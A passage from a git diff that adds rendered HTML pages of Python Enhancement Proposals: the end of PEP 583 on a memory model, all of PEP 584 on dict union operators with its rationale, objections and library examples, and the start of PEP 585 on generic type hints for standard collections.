If we adopt this, Jython’s dict implementation may no longer be +able to use ConcurrentHashMap because that only promises to create +appropriate happens-before edges, not to be sequentially consistent +(although maybe the fact that Java volatiles are totally ordered +carries over). Both Jython and IronPython would probably need to use +AtomicReferenceArray +or the equivalent for any __slots__ arrays.

+
+
+

Adapt the x86 model

+

The x86 model is:

+
    +
  1. Loads are not reordered with other loads.
  2. Stores are not reordered with other stores.
  3. Stores are not reordered with older loads.
  4. Loads may be reordered with older stores to different locations but not with older stores to the same location.
  5. In a multiprocessor system, memory ordering obeys causality (memory ordering respects transitive visibility).
  6. In a multiprocessor system, stores to the same location have a total order.
  7. In a multiprocessor system, locked instructions have a total order.
  8. Loads and stores are not reordered with locked instructions.
+

In acquire/release terminology, this appears to say that every store +is a release and every load is an acquire. This is slightly weaker +than sequential consistency, in that it allows inconsistent +orderings, but it disallows zombie values and the compiler +optimizations that produce them. We would probably want to weaken the +model somehow to explicitly allow compilers to eliminate redundant +variable reads. The x86 model may also be expensive to implement on +other platforms, although because x86 is so common, that may not +matter much.

+
+
+

Upgrading or downgrading to an alternate model

+

We can adopt an initial memory model without totally restricting +future implementations. If we start with a weak model and want to get +stronger later, we would only have to change the implementations, not +programs. Individual implementations could also guarantee a stronger +memory model than the language demands, although that could hurt +interoperability. On the other hand, if we start with a strong model +and want to weaken it later, we can add a from __future__ import +weak_memory statement to declare that some modules are safe.

+
+
+
+

Implementation Details

+

The required model is weaker than any particular implementation. This +section tries to document the actual guarantees each implementation +provides, and should be updated as the implementations change.

+
+

CPython

+

Uses the GIL to guarantee that other threads don’t see funny +reorderings, and does few enough optimizations that I believe it’s +actually sequentially consistent at the bytecode level. Threads can +switch between any two bytecodes (instead of only between statements), +so two threads that concurrently execute:

+
i = i + 1
+
+
+

with i initially 0 could easily end up with i==1 instead +of the expected i==2. If they execute:

+
i += 1
+
+
+

instead, CPython 2.6 will always give the right answer, but it’s easy +to imagine another implementation in which this statement won’t be +atomic.
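
As a quick illustration of the statement-level race (an added example, not from the PEP), several threads incrementing a shared global can lose updates, because a thread switch can occur between the load and the store:

import threading

counter = 0

def work():
    global counter
    for _ in range(100_000):
        counter = counter + 1   # load, add, store: a switch can hit in between

threads = [threading.Thread(target=work) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(counter)   # often prints less than 400000: increments were lost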

+
+
+

PyPy

+

Also uses a GIL, but probably does enough optimization to violate +sequential consistency. I know very little about this implementation.

+
+
+

Jython

+

Provides true concurrency under the Java memory model and stores +all object fields (except for those in __slots__?) in a +ConcurrentHashMap, +which provides fairly strong ordering guarantees. Local variables in +a function may have fewer guarantees, which would become visible if +they were captured into a closure that was then passed to another +thread.

+
+
+

IronPython

+

Provides true concurrency under the CLR memory model, which probably +protects it from uninitialized values. IronPython uses a locked +map to store object fields, providing at least as many guarantees as +Jython.

+
+
+
+

References

+ +
+
+

Acknowledgements

+

Thanks to Jeremy Manson and Alex Martelli for detailed discussions on +what this PEP should look like.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0583.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0584/index.html b/pep-0584/index.html new file mode 100644 index 00000000000..d317509f491 --- /dev/null +++ b/pep-0584/index.html @@ -0,0 +1,1169 @@ PEP 584 – Add Union Operators To dict | peps.python.org
+
+


+ + +
+
+
+

PEP 584 – Add Union Operators To dict

+
+
Author:
+
Steven D’Aprano <steve at pearwood.info>, +Brandt Bucher <brandt at python.org>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
01-Mar-2019
+
Python-Version:
+
3.9
+
Post-History:
+
01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, +17-Feb-2020
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding merge (|) and update (|=) operators +to the built-in dict class.

+
+

Note

+

After this PEP was accepted, the decision was made to also +implement the new operators for several other standard library +mappings.

+
+
+
+

Motivation

+

The current ways to merge two dicts have several disadvantages:

+
+

dict.update

+

d1.update(d2) modifies d1 in-place. +e = d1.copy(); e.update(d2) is not an expression and needs a +temporary variable.

+
+
+

{**d1, **d2}

+

Dict unpacking looks ugly and is not easily discoverable. Few people +would be able to guess what it means the first time they see it, or +think of it as the “obvious way” to merge two dicts.

+

As Guido said:

+
+
I’m sorry for PEP 448, but even if you know about **d in +simpler contexts, if you were to ask a typical Python user how +to combine two dicts into a new one, I doubt many people would +think of {**d1, **d2}. I know I myself had forgotten about +it when this thread started!
+

{**d1, **d2} ignores the types of the mappings and always returns +a dict. type(d1)({**d1, **d2}) fails for dict subclasses +such as defaultdict that have an incompatible __init__ method.
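
For instance (an illustrative snippet, not from the PEP):

>>> from collections import defaultdict
>>> d1 = defaultdict(list, {'spam': [1]})
>>> d2 = {'eggs': [2]}
>>> type(d1)({**d1, **d2})
Traceback (most recent call last):
  ...
TypeError: first argument must be callable or None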

+
+
+

collections.ChainMap

+

ChainMap is unfortunately poorly-known and doesn’t qualify as +“obvious”. It also resolves duplicate keys in the opposite order to +that expected (“first seen wins” instead of “last seen wins”). Like +dict unpacking, it is tricky to get it to honor the desired subclass. +For the same reason, type(d1)(ChainMap(d2, d1)) fails for some +subclasses of dict.

+

Further, ChainMaps wrap their underlying dicts, so writes to the +ChainMap will modify the original dict:

+
>>> d1 = {'spam': 1}
+>>> d2 = {'eggs': 2}
+>>> merged = ChainMap(d2, d1)
+>>> merged['eggs'] = 999
+>>> d2
+{'eggs': 999}
+
+
+
+
+

dict(d1, **d2)

+

This “neat trick” is not well-known, and only works when d2 is +entirely string-keyed:

+
>>> d1 = {"spam": 1}
+>>> d2 = {3665: 2}
+>>> dict(d1, **d2)
+Traceback (most recent call last):
+  ...
+TypeError: keywords must be strings
+
+
+
+
+
+

Rationale

+

The new operators will have the same relationship to the +dict.update method as the list concatenate (+) and extend +(+=) operators have to list.extend. Note that this is +somewhat different from the relationship that |/|= have with +set.update; the authors have determined that allowing the in-place +operator to accept a wider range of types (as list does) is a more +useful design, and that restricting the types of the binary operator’s +operands (again, as list does) will help avoid silent errors +caused by complicated implicit type casting on both sides.

+

Key conflicts will be resolved by keeping the rightmost value. This +matches the existing behavior of similar dict operations, where +the last seen value always wins:

+
{'a': 1, 'a': 2}
+{**d, **e}
+d.update(e)
+d[k] = v
+{k: v for x in (d, e) for (k, v) in x.items()}
+
+
+

All of the above follow the same rule. This PEP takes the position +that this behavior is simple, obvious, usually the behavior we want, +and should be the default behavior for dicts. This means that dict +union is not commutative; in general d | e != e | d.

+

Similarly, the iteration order of the key-value pairs in the +dictionary will follow the same semantics as the examples above, with +each newly added key (and its value) being appended to the current +sequence.

+
+
+

Specification

+

Dict union will return a new dict consisting of the left operand +merged with the right operand, each of which must be a dict (or an +instance of a dict subclass). If a key appears in both operands, +the last-seen value (i.e. that from the right-hand operand) wins:

+
>>> d = {'spam': 1, 'eggs': 2, 'cheese': 3}
+>>> e = {'cheese': 'cheddar', 'aardvark': 'Ethel'}
+>>> d | e
+{'spam': 1, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+>>> e | d
+{'cheese': 3, 'aardvark': 'Ethel', 'spam': 1, 'eggs': 2}
+
+
+

The augmented assignment version operates in-place:

+
>>> d |= e
+>>> d
+{'spam': 1, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+
+
+

Augmented assignment behaves identically to the update method +called with a single positional argument, so it also accepts anything +implementing the Mapping protocol (more specifically, anything with +the keys and __getitem__ methods) or iterables of key-value +pairs. This is analogous to list += and list.extend, which +accept any iterable, not just lists. Continued from above:

+
>>> d | [('spam', 999)]
+Traceback (most recent call last):
+  ...
+TypeError: can only merge dict (not "list") to dict
+
+>>> d |= [('spam', 999)]
+>>> d
+{'spam': 999, 'eggs': 2, 'cheese': 'cheddar', 'aardvark': 'Ethel'}
+
+
+

When new keys are added, their order matches their order within the +right-hand mapping, if any exists for its type.
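
For example (illustrative):

>>> {'a': 1, 'b': 2} | {'c': 3, 'b': 4}
{'a': 1, 'b': 4, 'c': 3}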

+
+
+

Reference Implementation

+

One of the authors has written a C implementation.

+

An approximate pure-Python implementation is:

+
def __or__(self, other):
+    if not isinstance(other, dict):
+        return NotImplemented
+    new = dict(self)
+    new.update(other)
+    return new
+
+def __ror__(self, other):
+    if not isinstance(other, dict):
+        return NotImplemented
+    new = dict(other)
+    new.update(self)
+    return new
+
+def __ior__(self, other):
+    dict.update(self, other)
+    return self
+
+
+
+
+

Major Objections

+
+

Dict Union Is Not Commutative

+

Union is commutative, but dict union will not be (d | e != e | d).

+
+

Response

+

There is precedent for non-commutative unions in Python:

+
>>> {0} | {False}
+{0}
+>>> {False} | {0}
+{False}
+
+
+

While the results may be equal, they are distinctly different. In +general, a | b is not the same operation as b | a.

+
+
+
+

Dict Union Will Be Inefficient

+

Giving a pipe operator to mappings is an invitation to writing code +that doesn’t scale well. Repeated dict union is inefficient: +d | e | f | g | h creates and destroys three temporary mappings.

+
+

Response

+

The same argument applies to sequence concatenation.

+

Sequence concatenation grows with the total number of items in the +sequences, leading to O(N**2) (quadratic) performance. Dict union is +likely to involve duplicate keys, so the temporary mappings will +not grow as fast.

+

Just as it is rare for people to concatenate large numbers of lists or +tuples, the authors of this PEP believe that it will be rare for +people to merge large numbers of dicts. collections.Counter is a +dict subclass that supports many operators, and there are no known +examples of people having performance issues due to combining large +numbers of Counters. Further, a survey of the standard library by the +authors found no examples of merging more than two dicts, so this is +unlikely to be a performance problem in practice… “Everything is +fast for small enough N”.

+

If one expects to be merging a large number of dicts where performance +is an issue, it may be better to use an explicit loop and in-place +merging:

+
new = {}
+for d in many_dicts:
+    new |= d
+
+
+
+
+
+

Dict Union Is Lossy

+

Dict union can lose data (values may disappear); no other form of +union is lossy.

+
+

Response

+

It isn’t clear why the first part of this argument is a problem. +dict.update() may throw away values, but not keys; that is +expected behavior, and will remain expected behavior regardless of +whether it is spelled as update() or |.

+

Other types of union are also lossy, in the sense of not being +reversible; you cannot get back the two operands given only the union. +a | b == 365… what are a and b?

+
+
+
+

Only One Way To Do It

+

Dict union will violate the Only One Way koan from the Zen.

+
+

Response

+

There is no such koan. “Only One Way” is a calumny about Python +originating long ago from the Perl community.

+
+
+
+

More Than One Way To Do It

+

Okay, the Zen doesn’t say that there should be Only One Way To Do It. +But it does have a prohibition against allowing “more than one way to +do it”.

+
+

Response

+

There is no such prohibition. The “Zen of Python” merely expresses a +preference for “only one obvious way”:

+
There should be one-- and preferably only one --obvious way to do
+it.
+
+
+

The emphasis here is that there should be an obvious way to do “it”. +In the case of dict update operations, there are at least two +different operations that we might wish to do:

+
    +
  • Update a dict in place: The Obvious Way is to use the update() +method. If this proposal is accepted, the |= augmented +assignment operator will also work, but that is a side-effect of how +augmented assignments are defined. Which you choose is a matter of +taste.
  • +
  • Merge two existing dicts into a third, new dict: This PEP proposes +that the Obvious Way is to use the | merge operator.
  • +
+

In practice, this preference for “only one way” is frequently violated +in Python. For example, every for loop could be re-written as a +while loop; every if block could be written as an if/ +else block. List, set and dict comprehensions could all be +replaced by generator expressions. Lists offer no fewer than five +ways to implement concatenation:

+
    +
  • Concatenation operator: a + b
  • +
  • In-place concatenation operator: a += b
  • +
  • Slice assignment: a[len(a):] = b
  • +
  • Sequence unpacking: [*a, *b]
  • +
  • Extend method: a.extend(b)
  • +
+

We should not be too strict about rejecting useful functionality +because it violates “only one way”.

+
+
+
+

Dict Union Makes Code Harder To Understand

+

Dict union makes it harder to tell what code means. To paraphrase the +objection rather than quote anyone in specific: “If I see +spam | eggs, I can’t tell what it does unless I know what spam +and eggs are”.

+
+

Response

+

This is very true. But it is equally true today, where the use of the +| operator could mean any of:

+
    +
  • int/bool bitwise-or
  • +
  • set/frozenset union
  • +
  • any other overloaded operation
  • +
+

Adding dict union to the set of possibilities doesn’t seem to make +it harder to understand the code. No more work is required to +determine that spam and eggs are mappings than it would take +to determine that they are sets, or integers. And good naming +conventions will help:

+
flags |= WRITEABLE  # Probably numeric bitwise-or.
+DO_NOT_RUN = WEEKENDS | HOLIDAYS  # Probably set union.
+settings = DEFAULT_SETTINGS | user_settings | workspace_settings  # Probably dict union.
+
+
+
+
+
+

What About The Full set API?

+

dicts are “set like”, and should support the full collection of set +operators: |, &, ^, and -.

+
+

Response

+

This PEP does not take a position on whether dicts should support the +full collection of set operators, and would prefer to leave that for a +later PEP (one of the authors is interested in drafting such a PEP). +For the benefit of any later PEP, a brief summary follows.

+

Set symmetric difference (^) is obvious and natural. For example, +given two dicts:

+
d1 = {"spam": 1, "eggs": 2}
+d2 = {"ham": 3, "eggs": 4}
+
+
+

the symmetric difference d1 ^ d2 would be +{"spam": 1, "ham": 3}.

+

Set difference (-) is also obvious and natural, and an earlier +version of this PEP included it in the proposal. Given the dicts +above, we would have d1 - d2 be {"spam": 1} and d2 - d1 be +{"ham": 3}.

+

Set intersection (&) is a bit more problematic. While it is easy to determine the intersection of keys in two dicts, it is not clear what to do with the values. Given the two dicts above, it is obvious that the only key of d1 & d2 must be "eggs", but it is ambiguous whether its value should be 2 (from d1) or 4 (from d2). “Last seen wins” would, however, have the advantage of consistency with other dict operations (and the proposed union operators).
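A rough sketch of these candidate semantics in terms of existing dict and set operations (assuming Python 3.9 for the | operator; the exact key order is illustrative):

d1 = {"spam": 1, "eggs": 2}
d2 = {"ham": 3, "eggs": 4}

# Symmetric difference: keys appearing in exactly one dict keep their value.
sym = {k: (d1 | d2)[k] for k in d1.keys() ^ d2.keys()}
# -> {"spam": 1, "ham": 3}

# Difference: keys of d1 that are absent from d2.
diff = {k: v for k, v in d1.items() if k not in d2}
# -> {"spam": 1}

# Intersection with "last seen wins" values.
inter = {k: d2[k] for k in d1.keys() & d2.keys()}
# -> {"eggs": 4}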

+
+
+
+

What About Mapping And MutableMapping?

+

collections.abc.Mapping and collections.abc.MutableMapping +should define | and |=, so subclasses could just inherit the +new operators instead of having to define them.

+
+

Response

+

There are two primary reasons why adding the new operators to these +classes would be problematic:

+
    +
  • Currently, neither defines a copy method, which would be +necessary for | to create a new instance.
  • +
  • Adding |= to MutableMapping (or a copy method to +Mapping) would create compatibility issues for virtual +subclasses.
  • +
+
+
+
+
+

Rejected Ideas

+
+

Rejected Semantics

+

There were at least four other proposed solutions for handling +conflicting keys. These alternatives are left to subclasses of dict.

+
+

Raise

+

It isn’t clear that this behavior has many use-cases or would often be useful, but it would likely be annoying, as any use of the dict union operator would have to be guarded with a try/except clause.
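For illustration, code using such a raising operator would have to look roughly like this (the exception type, handle_conflict and the dict names are all hypothetical):

try:
    combined = defaults | overrides
except KeyError:  # hypothetical exception raised on a duplicate key
    combined = handle_conflict(defaults, overrides)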

+
+
+

Add The Values (As Counter Does, with +)

+

Too specialised to be used as the default behavior.

+
+
+

Leftmost Value (First-Seen) Wins

+

It isn’t clear that this behavior has many use-cases. In fact, one +can simply reverse the order of the arguments:

+
d2 | d1  # d1 merged with d2, keeping existing values in d1
+
+
+
+
+

Concatenate Values In A List

+

This is likely to be too specialised to be the default. It is not +clear what to do if the values are already lists:

+
{'a': [1, 2]} | {'a': [3, 4]}
+
+
+

Should this give {'a': [1, 2, 3, 4]} or +{'a': [[1, 2], [3, 4]]}?

+
+
+
+

Rejected Alternatives

+
+

Use The Addition Operator

+

This PEP originally started life as a proposal for dict addition, +using the + and += operator. That choice proved to be +exceedingly controversial, with many people having serious objections +to the choice of operator. For details, see previous versions of the +PEP and the mailing list discussions.

+
+
+

Use The Left Shift Operator

+

The << operator didn’t seem to get much support on Python-Ideas, but drew no major objections either. Perhaps the strongest objection was Chris Angelico’s comment

+
+
The “cuteness” value of abusing the operator to indicate +information flow got old shortly after C++ did it.
+
+
+

Use A New Left Arrow Operator

+

Another suggestion was to create a new operator <-. Unfortunately +this would be ambiguous, d <- e could mean d merge e or +d less-than minus e.
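The second reading is already legal syntax today, as a quick check with integers shows:

>>> d, e = 5, 3
>>> d <- e   # parsed as d < (-e)
False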

+
+
+

Use A Method

+

A dict.merged() method would avoid the need for an operator at +all. One subtlety is that it would likely need slightly different +implementations when called as an unbound method versus as a bound +method.

+

As an unbound method, the behavior could be similar to:

+
def merged(cls, *mappings, **kw):
+    new = cls()  # Will this work for defaultdict?
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+

As a bound method, the behavior could be similar to:

+
def merged(self, *mappings, **kw):
+    new = self.copy()
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+
+
Advantages
+
    +
  • Arguably, methods are more discoverable than operators.
  • +
  • The method could accept any number of positional and keyword +arguments, avoiding the inefficiency of creating temporary dicts.
  • +
  • Accepts sequences of (key, value) pairs like the update +method.
  • +
  • Being a method, it is easy to override in a subclass if you need +alternative behaviors such as “first wins”, “unique keys”, etc.
  • +
+
+
+
Disadvantages
+
    +
  • Would likely require a new kind of method decorator which combined +the behavior of regular instance methods and classmethod. It +would need to be public (but not necessarily a builtin) for those +needing to override the method. There is a +proof of concept.
  • +
  • It isn’t an operator. Guido discusses why operators are useful. +For another viewpoint, see Alyssa Coghlan’s blog post.
  • +
+
+
+
+

Use a Function

+

Instead of a method, use a new built-in function merged(). One +possible implementation could be something like this:

+
def merged(*mappings, **kw):
+    if mappings and isinstance(mappings[0], dict):
+        # If the first argument is a dict, use its type.
+        new = mappings[0].copy()
+        mappings = mappings[1:]
+    else:
+        # No positional arguments, or the first argument is a
+        # sequence of (key, value) pairs.
+        new = dict()
+    for m in mappings:
+        new.update(m)
+    new.update(kw)
+    return new
+
+
+

An alternative might be to forgo the arbitrary keywords, and take a +single keyword parameter that specifies the behavior on collisions:

+
def merged(*mappings, on_collision=lambda k, v1, v2: v2):
+    # implementation left as an exercise to the reader
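One hypothetical way to fill in that exercise, using a plain dict for the result, might be:

def merged(*mappings, on_collision=lambda k, v1, v2: v2):
    new = {}
    for m in mappings:
        # dict(m) accepts both mappings and sequences of (key, value) pairs.
        for key, value in dict(m).items():
            if key in new:
                # Let the caller decide which value survives.
                new[key] = on_collision(key, new[key], value)
            else:
                new[key] = value
    return new

With the default callback the behavior matches “last seen wins”; passing on_collision=lambda k, v1, v2: v1 would give “first seen wins” instead.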
+
+
+
+
Advantages
+
    +
  • Most of the same advantages of the method solutions above.
  • +
  • Doesn’t require a subclass to implement alternative behavior on +collisions, just a function.
  • +
+
+
+
Disadvantages
+
    +
  • May not be important enough to be a builtin.
  • +
  • Hard to override behavior if you need something like “first wins”, +without losing the ability to process arbitrary keyword arguments.
  • +
+
+
+
+
+
+

Examples

+

The authors of this PEP did a survey of third party libraries for +dictionary merging which might be candidates for dict union.

+

This is a cursory list based on a subset of whatever arbitrary +third-party packages happened to be installed on one of the authors’ +computers, and may not reflect the current state of any package. Also +note that, while further (unrelated) refactoring may be possible, the +rewritten version only adds usage of the new operators for an +apples-to-apples comparison. It also reduces the result to an +expression when it is efficient to do so.

+
+

IPython/zmq/ipkernel.py

+

Before:

+
aliases = dict(kernel_aliases)
+aliases.update(shell_aliases)
+
+
+

After:

+
aliases = kernel_aliases | shell_aliases
+
+
+
+
+

IPython/zmq/kernelapp.py

+

Before:

+
kernel_aliases = dict(base_aliases)
+kernel_aliases.update({
+    'ip' : 'KernelApp.ip',
+    'hb' : 'KernelApp.hb_port',
+    'shell' : 'KernelApp.shell_port',
+    'iopub' : 'KernelApp.iopub_port',
+    'stdin' : 'KernelApp.stdin_port',
+    'parent': 'KernelApp.parent',
+})
+if sys.platform.startswith('win'):
+    kernel_aliases['interrupt'] = 'KernelApp.interrupt'
+
+kernel_flags = dict(base_flags)
+kernel_flags.update({
+    'no-stdout' : (
+            {'KernelApp' : {'no_stdout' : True}},
+            "redirect stdout to the null device"),
+    'no-stderr' : (
+            {'KernelApp' : {'no_stderr' : True}},
+            "redirect stderr to the null device"),
+})
+
+
+

After:

+
kernel_aliases = base_aliases | {
+    'ip' : 'KernelApp.ip',
+    'hb' : 'KernelApp.hb_port',
+    'shell' : 'KernelApp.shell_port',
+    'iopub' : 'KernelApp.iopub_port',
+    'stdin' : 'KernelApp.stdin_port',
+    'parent': 'KernelApp.parent',
+}
+if sys.platform.startswith('win'):
+    kernel_aliases['interrupt'] = 'KernelApp.interrupt'
+
+kernel_flags = base_flags | {
+    'no-stdout' : (
+            {'KernelApp' : {'no_stdout' : True}},
+            "redirect stdout to the null device"),
+    'no-stderr' : (
+            {'KernelApp' : {'no_stderr' : True}},
+            "redirect stderr to the null device"),
+}
+
+
+
+
+

matplotlib/backends/backend_svg.py

+

Before:

+
attrib = attrib.copy()
+attrib.update(extra)
+attrib = attrib.items()
+
+
+

After:

+
attrib = (attrib | extra).items()
+
+
+
+
+

matplotlib/delaunay/triangulate.py

+

Before:

+
edges = {}
+edges.update(dict(zip(self.triangle_nodes[border[:,0]][:,1],
+             self.triangle_nodes[border[:,0]][:,2])))
+edges.update(dict(zip(self.triangle_nodes[border[:,1]][:,2],
+             self.triangle_nodes[border[:,1]][:,0])))
+edges.update(dict(zip(self.triangle_nodes[border[:,2]][:,0],
+             self.triangle_nodes[border[:,2]][:,1])))
+
+
+

After:

+
edges = {}
+edges |= zip(self.triangle_nodes[border[:,0]][:,1],
+             self.triangle_nodes[border[:,0]][:,2])
+edges |= zip(self.triangle_nodes[border[:,1]][:,2],
+             self.triangle_nodes[border[:,1]][:,0])
+edges |= zip(self.triangle_nodes[border[:,2]][:,0],
+             self.triangle_nodes[border[:,2]][:,1])
+
+
+
+
+

matplotlib/legend.py

+

Before:

+
hm = default_handler_map.copy()
+hm.update(self._handler_map)
+return hm
+
+
+

After:

+
return default_handler_map | self._handler_map
+
+
+
+
+

numpy/ma/core.py

+

Before:

+
_optinfo = {}
+_optinfo.update(getattr(obj, '_optinfo', {}))
+_optinfo.update(getattr(obj, '_basedict', {}))
+if not isinstance(obj, MaskedArray):
+    _optinfo.update(getattr(obj, '__dict__', {}))
+
+
+

After:

+
_optinfo = {}
+_optinfo |= getattr(obj, '_optinfo', {})
+_optinfo |= getattr(obj, '_basedict', {})
+if not isinstance(obj, MaskedArray):
+    _optinfo |= getattr(obj, '__dict__', {})
+
+
+
+
+

praw/internal.py

+

Before:

+
data = {'name': six.text_type(user), 'type': relationship}
+data.update(kwargs)
+
+
+

After:

+
data = {'name': six.text_type(user), 'type': relationship} | kwargs
+
+
+
+
+

pygments/lexer.py

+

Before:

+
kwargs.update(lexer.options)
+lx = lexer.__class__(**kwargs)
+
+
+

After:

+
lx = lexer.__class__(**(kwargs | lexer.options))
+
+
+
+
+

requests/sessions.py

+

Before:

+
merged_setting = dict_class(to_key_val_list(session_setting))
+merged_setting.update(to_key_val_list(request_setting))
+
+
+

After:

+
merged_setting = dict_class(to_key_val_list(session_setting)) | to_key_val_list(request_setting)
+
+
+
+
+

sphinx/domains/__init__.py

+

Before:

+
self.attrs = self.known_attrs.copy()
+self.attrs.update(attrs)
+
+
+

After:

+
self.attrs = self.known_attrs | attrs
+
+
+
+
+

sphinx/ext/doctest.py

+

Before:

+
new_opt = code[0].options.copy()
+new_opt.update(example.options)
+example.options = new_opt
+
+
+

After:

+
example.options = code[0].options | example.options
+
+
+
+
+

sphinx/ext/inheritance_diagram.py

+

Before:

+
n_attrs = self.default_node_attrs.copy()
+e_attrs = self.default_edge_attrs.copy()
+g_attrs.update(graph_attrs)
+n_attrs.update(node_attrs)
+e_attrs.update(edge_attrs)
+
+
+

After:

+
g_attrs |= graph_attrs
+n_attrs = self.default_node_attrs | node_attrs
+e_attrs = self.default_edge_attrs | edge_attrs
+
+
+
+
+

sphinx/highlighting.py

+

Before:

+
kwargs.update(self.formatter_args)
+return self.formatter(**kwargs)
+
+
+

After:

+
return self.formatter(**(kwargs | self.formatter_args))
+
+
+
+
+

sphinx/quickstart.py

+

Before:

+
d2 = DEFAULT_VALUE.copy()
+d2.update(dict(("ext_"+ext, False) for ext in EXTENSIONS))
+d2.update(d)
+d = d2
+
+
+

After:

+
d = DEFAULT_VALUE | dict(("ext_"+ext, False) for ext in EXTENSIONS) | d
+
+
+
+
+

sympy/abc.py

+

Before:

+
clash = {}
+clash.update(clash1)
+clash.update(clash2)
+return clash1, clash2, clash
+
+
+

After:

+
return clash1, clash2, clash1 | clash2
+
+
+
+
+

sympy/parsing/maxima.py

+

Before:

+
dct = MaximaHelpers.__dict__.copy()
+dct.update(name_dict)
+obj = sympify(str, locals=dct)
+
+
+

After:

+
obj = sympify(str, locals=MaximaHelpers.__dict__|name_dict)
+
+
+
+
+

sympy/printing/ccode.py and sympy/printing/fcode.py

+

Before:

+
self.known_functions = dict(known_functions)
+userfuncs = settings.get('user_functions', {})
+self.known_functions.update(userfuncs)
+
+
+

After:

+
self.known_functions = known_functions | settings.get('user_functions', {})
+
+
+
+
+

sympy/utilities/runtests.py

+

Before:

+
globs = globs.copy()
+if extraglobs is not None:
+    globs.update(extraglobs)
+
+
+

After:

+
globs = globs | (extraglobs if extraglobs is not None else {})
+
+
+

The above examples show that sometimes the | operator leads to a clear increase in readability, reducing the number of lines of code and improving clarity. However other examples using the | operator lead to long, complex single expressions, possibly well over the PEP 8 maximum line length of 79 characters. As with any other language feature, the programmer should use their own judgement about whether | improves their code.

+
+
+ + +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0584.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0585/index.html b/pep-0585/index.html new file mode 100644 index 00000000000..abe5d1e8e45 --- /dev/null +++ b/pep-0585/index.html @@ -0,0 +1,493 @@ + PEP 585 – Type Hinting Generics In Standard Collections | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 585 – Type Hinting Generics In Standard Collections

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
03-Mar-2019
+
Python-Version:
+
3.9
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Generic Alias Type +and the documentation for __class_getitem__().

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Static typing as defined by PEPs 484, 526, 544, 560, and 563 was built +incrementally on top of the existing Python runtime and constrained by +existing syntax and runtime behavior. This led to the existence of +a duplicated collection hierarchy in the typing module due to +generics (for example typing.List and the built-in list).

+

This PEP proposes to enable support for the generics syntax in all +standard collections currently available in the typing module.

+
+
+

Rationale and Goals

+

This change removes the necessity for a parallel type hierarchy in the +typing module, making it easier for users to annotate their programs +and easier for teachers to teach Python.

+
+
+

Terminology

+

Generic (n.) – a type that can be parameterized, typically a container. +Also known as a parametric type or a generic type. For example: +dict.

+

parameterized generic – a specific instance of a generic with the +expected types for container elements provided. Also known as +a parameterized type. For example: dict[str, int].

+
+
+

Backwards compatibility

+

Tooling, including type checkers and linters, will have to be adapted to +recognize standard collections as generics.

+

On the source level, the newly described functionality requires +Python 3.9. For use cases restricted to type annotations, Python files +with the “annotations” future-import (available since Python 3.7) can +parameterize standard collections, including builtins. To reiterate, +that depends on the external tools understanding that this is valid.

+
+
+

Implementation

+

Starting with Python 3.7, when from __future__ import annotations is +used, function and variable annotations can parameterize standard +collections directly. Example:

+
from __future__ import annotations
+
+def find(haystack: dict[str, list[int]]) -> int:
+    ...
+
+
+

Usefulness of this syntax before PEP 585 is limited as external tooling +like Mypy does not recognize standard collections as generic. Moreover, +certain features of typing like type aliases or casting require putting +types outside of annotations, in runtime context. While these are +relatively less common than type annotations, it’s important to allow +using the same type syntax in all contexts. This is why starting with +Python 3.9, the following collections become generic using +__class_getitem__() to parameterize contained types:

+
    +
  • tuple # typing.Tuple
  • +
  • list # typing.List
  • +
  • dict # typing.Dict
  • +
  • set # typing.Set
  • +
  • frozenset # typing.FrozenSet
  • +
  • type # typing.Type
  • +
  • collections.deque
  • +
  • collections.defaultdict
  • +
  • collections.OrderedDict
  • +
  • collections.Counter
  • +
  • collections.ChainMap
  • +
  • collections.abc.Awaitable
  • +
  • collections.abc.Coroutine
  • +
  • collections.abc.AsyncIterable
  • +
  • collections.abc.AsyncIterator
  • +
  • collections.abc.AsyncGenerator
  • +
  • collections.abc.Iterable
  • +
  • collections.abc.Iterator
  • +
  • collections.abc.Generator
  • +
  • collections.abc.Reversible
  • +
  • collections.abc.Container
  • +
  • collections.abc.Collection
  • +
  • collections.abc.Callable
  • +
  • collections.abc.Set # typing.AbstractSet
  • +
  • collections.abc.MutableSet
  • +
  • collections.abc.Mapping
  • +
  • collections.abc.MutableMapping
  • +
  • collections.abc.Sequence
  • +
  • collections.abc.MutableSequence
  • +
  • collections.abc.ByteString
  • +
  • collections.abc.MappingView
  • +
  • collections.abc.KeysView
  • +
  • collections.abc.ItemsView
  • +
  • collections.abc.ValuesView
  • +
  • contextlib.AbstractContextManager # typing.ContextManager
  • +
  • contextlib.AbstractAsyncContextManager # typing.AsyncContextManager
  • +
  • re.Pattern # typing.Pattern, typing.re.Pattern
  • +
  • re.Match # typing.Match, typing.re.Match
  • +
+
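For example, on Python 3.9 the standard collections above can be subscripted directly:

>>> import collections
>>> collections.deque[int]
collections.deque[int]
>>> import collections.abc
>>> collections.abc.Mapping[str, list[int]]
collections.abc.Mapping[str, list[int]]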

Importing those from typing is deprecated. Due to PEP 563 and the +intention to minimize the runtime impact of typing, this deprecation +will not generate DeprecationWarnings. Instead, type checkers may warn +about such deprecated usage when the target version of the checked +program is signalled to be Python 3.9 or newer. It’s recommended to +allow for those warnings to be silenced on a project-wide basis.

+

